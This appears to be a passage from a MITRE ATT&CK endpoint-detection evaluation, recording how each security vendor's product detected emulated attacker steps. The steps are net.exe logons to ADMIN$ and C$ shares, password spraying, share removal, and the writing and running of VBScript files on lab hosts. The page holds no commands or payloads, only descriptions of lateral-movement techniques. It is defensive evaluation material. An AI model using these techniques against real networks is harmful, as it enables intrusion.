The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed logon attempt targeting ADMIN$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Enrichment
The capability enriched a logon attempt via net.exe with an alert for Net Use Command Execution (Weak Signal). The alert details showed net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. The alert was also tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker accessed Conficker by mounting the ADMIN$ share. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Specific Behavior
Specific Behavior alerts were generated for net.exe connecting to a remote administrative share. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick. Telemetry also showed explorer.exe (as the user Bob) write a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted (tainted by the parent FileExts Registry Key modified alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe to ADMIN$ with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the net utility executed to authenticate to a remote admin share with valid accounts. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). [1] [2] [3] [4] [5]
Microsoft
Specific Behavior (Delayed)
A delayed Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting ADMIN$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local Kmitnick. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt via net.exe and command-line arguments targeting ADMIN$ via net.exe and command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments targeting ADMIN$ via net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. [1] [2] [3] [4]
Enrichment (Configuration Change)
The capability enriched individual net.exe events with tagging titled \"Credential Access using Admin Shares - Failed Attempts\" for failures as well as a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. The capability was modified after the start of the evaluation enabling enrichment to appear, so the detection is identified as a configuration change. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection. OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Enrichment (Tainted)
The capability enriched net.exe execution with a related ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares) in addition to labeling net.exe as having a High Internal Outgoing Embryonic Connection Rate (meaning 25% of the internal network connections did not receive a response). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed net.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and  Tactics (Execution, Lateral Movement). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Enrichment (Tainted)
The capability enriched each individual net.exe connection with a tag titled Lateral Movement via \"Mounting Hidden Shares\" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Use Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the successful logon for the user Kmitnick. [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
Enrichment
The capability enriched multiple occurrences of net.exe usage as indicative of brute forcing a remote system as well as the correct ATT&CK Technique ID (Brute Force). Screenshot is not available due to sensitivity of rule logic. [1] [2]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry also showed explorer.exe (as the user Bob) write a PIPE on Conficker, which could indicate to an analyst that the share had been successfully mounted (tainted by the parent FileExts Registry Key modified alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
Enrichment (Tainted)
The capability enriched a net.exe logon attempt targeting ADMIN$ with the condition \"Net User Reconnaissance Command\". The enrichment was tainted by the parent \"Powershell executed remote commands\" alert. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Specific Behavior
A Specific Behavior alert was generated for powershell.exe performing a potential brute force password hack via the net utility. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to login using the valid credentials of user Kmitnick. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, eventually resulting in a successful logon (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Specific Behavior (Delayed)
A Specific Behavior alert was generated based on brute force attempt by accessing remote SMB shares with different accounts. The alert spans multiple login attempts. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to ADMIN$ on 10.0.0.5 (Conficker) as local user Kmitnick followed by an event for the credentials being validated by the DC. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. [1] [2]
SentinelOne
Telemetry (Tainted)
Telemetry showed repeated logon attempts via net.exe and command-line arguments indicative of password spraying, eventually resulting in a successful logon. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). The log files showed an exit code of 0x2 which indicates a logon failure, but does not differentiate between bad credentials and access denied to resource. [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed a process tree containing net.exe and command-line arguments. [1] [2]
Specific Behavior
A Specific Behavior alert was generated indicating that a connected network share was removed. [1] [2]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection. [1] [2]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert. [1]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1]
Endgame
Telemetry (Tainted)
Telemetry showed a event tree containing net.exe and command-line arguments (tainted by parent PowerShell alert). [1]
FireEye
Telemetry
Telemetry showed net.exe executing with command-line arguments. [1] [2]
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker unmounted the share from CodeRed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by the parent "Powershell executed remote commands" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2]
Specific Behavior
A Specific Behavior alert was generated for the net utility removing a shared connection via PowerShell. The alert was tagged with the correct ATT&CK Tactic (Defense Evasion) and Technique (Network Share Connection Removal). [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed net.exe with command-line arguments (tainted by parent alert on PowerShell script with suspicious content). [1] [2]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Network Share Connection Removal). [1] [2]
RSA
Telemetry
Telemetry showed net.exe execution and command-line arguments. [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed execution of net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments  targeting C$ using valid account credentials. [1] [2] [3] [4] [5] [6]
Specific Behavior
Specific Behavior alerts were generated mapped to the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) for successful logons. [1] [2] [3] [4] [5] [6]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on 10.0.0.4 (Creeper) as the user Kmitnick. The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Specific Behavior (Tainted)
A Specific Behavior alert was generated for net.exe attempting to mount an administrative share. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
Endgame
Specific Behavior (Tainted)
A Specific Behavior alert was triggered for each individual net.exe connection with a tag titled Lateral Movement via "Mounting Hidden Shares" (tainted by parent PowerShell alert). The alert was also tagged with  the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) . [1] [2] [3] [4] [5] [6]
Telemetry (Tainted)
Telemetry showed logon attempt targeting C$ via net.exe and command-line arguments. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Enrichment
The capability enriched net1.exe with an alert for Net Use Command Execution (Weak Signal). The alert also was tagged with the correct ATT&CK Technique (T1077 - Windows Admin Shares) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. [1] [2] [3] [4] [5] [6] [7] [8]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6] [7]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4] [5]
Specific Behavior
A Specific Behavior alert was generated for the net utility executed to authenticate to a remote admin share with valid accounts. The alert was tagged with the correct ATT&CK Tactic (Lateral Movement) and Technique (Windows Admin Shares). [1] [2] [3] [4] [5]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a logon attempt via net.exe and command-line arguments targeting C$ via net.exe and command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments targeting C$ via net.exe and command-line arguments. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments using valid account credentials. [1] [2] [3] [4] [5]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to the C$ share on Creeper as the user Kmitnick. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was tainted by a parent PowerShell alert. [1] [2] [3]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was showed to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3]
Endgame
Enrichment (Tainted)
The capability enriched the net.exe connection (using valid credentials for Kmitnick) with a tag titled Lateral Movement via \"Mounting Hidden Shares\" (tainted by parent PowerShell alert). [1] [2] [3] [4] [5]
Enrichment (Delayed, Tainted)
The capability enriched net.exe connection events with a related ATT&CK Technique (T1077 - Windows Admin Shares) and Tactics (Execution, Lateral Movement) (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials for user Kmitnick (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker mounted the C$ drive on creeper with the kmitnick account. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched a logon attempt via net1.exe using valid credentials for user Kmitnick with an alert for Net Use Command Execution (Weak Signal). The password for the user Kmitnick was redacted by the capability. The vendor indicated the un-redacted passwords could be observed in triage/acquistion data. [1] [2] [3] [4] [5] [6]
F-Secure
Enrichment
The capability enriched the net.exe connection using valid credentials of Kmitnick with an alert for possible lateral movement. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Telemetry also showed a logon event for user Kmitnick on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on powershell.exe. [1] [2] [3] [4]
Microsoft
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments targeting C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick (tainted by parent alert on PowerShell script with suspicious content). Telemetry also showed that the logon event for Kmitnick on Creeper was successful. [1] [2] [3] [4] [5] [6] [7] [8]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed a net.exe logon attempt to C$ on 10.0.0.4 (Creeper) using valid credentials for user Kmitnick followed by a event for a successful login. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6]
RSA
Telemetry
Telemetry showed a process tree containing a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe and command-line arguments using valid credentials of user Kmitnick. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4]
Carbon Black
Telemetry
Telemetry showed filemods showing the creation and writing to autoupdate.vbs. [1] [2] [3] [4]
CrowdStrike
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because a .vbs was written to the filesystem, which was likely used to carry out additional actions. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed File Write and New Script Write events for autoupdate.vbs under powershell.exe. The telemetry was tainted by a previous detection. [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed the file write of autoupdate.vbs. The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry (Tainted)
Telemetry showed creation of autoupdate.vbs (tainted by parent PowerShell alert). [1] [2] [3] [4]
FireEye
Enrichment
The capability enriched powershell.exe writing autoupdate.vbs with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed the file creation of autoupdate.vbs. [1] [2] [3] [4] [5] [6]
GoSecure
Telemetry (Tainted)
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent Powershell executed remote commands alerts) . Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Remote File Copy) and a suspicious indicator that a file was copied to a remote computer via PowerShell. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the creation of autoupdate.vbs on Code Red (10.0.1.5). [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed powershell.exe creating autoupdate.vbs (tainted by parent alert on PowerShell script with suspicious content). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry
Telemetry showed file create and write events for autoupdate.vbs. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
RSA
Telemetry
Telemetry showed file write of autoupdate.vbs. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed creation and file write events for autoupdate.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6]
Carbon Black
Telemetry
Telemetry showed a process tree with cmd.exe execution and associated user context change. [1] [2] [3]
Enrichment
The capability enriched cmd.exe event data with the correct ATT&CK Technique (T1059 - Command-Line Interface). [1] [2] [3]
CrowdStrike
Telemetry (Tainted)
Telemetry showed a new cmd.exe process running wscript.exe as user Kmitnick, which then launched powershell.exe. The command line arguments for cmd.exe showed that autoupdate.vbs was run. The telemetry was tainted by a previous detection. [1] [2]
Cybereason
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs though wscript.exe. The telemetry was tainted by a parent PowerShell alert based on a malicious Invoke-RunAs command. [1] [2]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the execution of autoupdate.vbs with a related ATT&CK Technique (T1064 - Scripting) and Tactic (Execution). (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3]
Enrichment (Tainted)
The capability enriched events related to cmd.exe launching PowerShell via wscript.exe running autoupdate.vbs (tainted by parent PowerShell alert). [1] [2] [3]
Telemetry (Tainted)
Telemetry showed cmd.exe execution and associated user context change (tainted by parent PowerShell alert). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3]
FireEye
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs with a parent process of powershell.exe. [1] [2]
Enrichment
The capability enriched cmd.exe spawning wscript.exe with an alert for Wscript Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). Alert details showed that the context of the user was changed to Kmitnick. [1] [2]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (cmd.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2]
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs through wscript.exe, and the associated user context change between user Bob and user Kmitnick. [1] [2]
GoSecure
Telemetry (Tainted)
Telemetry showed svchost.exe creating cmd.exe, which ran autoupdate.vbs as user Kmitnick (tainted by the parent \"Powershell executed remote commands\" alert). Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Enrichment
The capability enriched wscript.exe executing autoupdate.vbs with the correct ATT&CK Tactic (Execution) and Technique (Command Line Interface). [1] [2]
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs as user Kmitnick. [1] [2]
Microsoft
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick. The execution generated three new PowerShell related alerts for the initial execution sequence of Empire that tainted this event, but were not counted as separate detections for this technique. [1] [2] [3] [4]
Palo Alto Networks
Enrichment
The capability enriched wscript.exe executing autoupdate.vbs with a related ATT&CK Technique (Scripting). [1] [2] [3]
Telemetry (Tainted)
Telemetry showed cmd.exe executing autoupdate.vbs. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3]
Indicator of Compromise
An Indicator of Compromise Alert was generated identify PowerShell Empire using the Runas functionality. [1] [2] [3]
RSA
Telemetry
Telemetry showed cmd.exe executing autoupdate.vbs via wscript.exe as user Kmitnick [1]
SentinelOne
Telemetry (Tainted)
Telemetry showed cmd.exe execution of autoupdate.vbs. The activity seen during the initial compromise step tainted the event because it was associated with the same story (Group ID). [1]
Carbon Black
Telemetry
Telemetry showed filemods showing the creation and writing to update.vbs on remote host 10.0.0.4 (Creeper). [1] [2] [3] [4]
CrowdStrike
Telemetry
Telemetry showed update.vbs written to the C$ remote share on host 10.0.0.4 (Creeper). [1] [2] [3] [4] [5] [6] [7] [8]
Cybereason
Telemetry (Tainted)
Telemetry showed file events for the write of update.vbs to Creeper (10.0.0.4). The telemetry was tainted by a parent PowerShell alert listed as the owner process. [1] [2] [3] [4] [5] [6] [7]
Endgame
Telemetry
Telemetry for file creation events was available, and would show the creation of update.vbs. No screenshot for the event was made available, though other file creation events, as well as the subsequent execution of update.vbs was identified. [1] [2] [3] [4]
FireEye
Specific Behavior (Delayed)
The Managed Defense Report indicated a Specific Behavior occurred because it identified the autoupdate.vbs script being written to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment
The capability enriched powershell.exe writing update.vbs with an alert for File Write to Network Share (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactic (Lateral Movement). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
F-Secure
Telemetry
Telemetry showed the file creation of update.vbs. [1] [2] [3] [4] [5] [6]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability enriched the update.vbs creation event with the condition \"File created on hidden share (C$)\". The enrichment was tainted by parent \"Powershell executed remote commands\" alerts. The condition contributing to enrichment may have been added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched powershell.exe with the correct ATT&CK Tactic (Command and Control) and Technique (Remote File Copy) and a suspicious indicator that a file was copied to a remote computer via PowerShell. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the creation of update.vbs on Creeper (10.0.0.4). [1] [2] [3] [4] [5] [6] [7] [8]
Microsoft
Telemetry (Tainted)
Telemetry showed creation of update.vbs on 10.0.0.4 (Creeper) and the remote file copy action from 10.0.1.5 (CodeRed) (the remote file copy event on CodeRed was tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Palo Alto Networks
Telemetry
Telemetry showed file create and write events for update.vbs. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Specific Behavior (Tainted)
